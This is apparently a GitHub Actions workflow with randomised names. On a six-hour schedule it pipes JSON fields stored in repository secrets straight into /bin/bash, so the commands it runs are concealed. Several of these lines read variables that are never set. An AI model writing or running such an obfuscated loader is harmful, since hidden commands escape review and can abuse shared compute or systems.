name: xueziyang1995

on:
  workflow_dispatch:
  schedule:
    - cron: '55 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xueziyang1995
        env:
          lfjam2: ${{ secrets.lfjam2 }}
        run: |
          echo $lfjam2 | jq -r .pkvh61 | /bin/bash
          echo $zwll5227 | jq -r .iz798 | /bin/bash
          echo $ceo288 | jq -r .wl353 | /bin/bash
          echo $p847 | jq -r .sp8557 | /bin/bash
          echo $iuutj6411 | jq -r .elp66 | /bin/bash
          echo $wbt033 | jq -r .zvhkx149 | /bin/bash

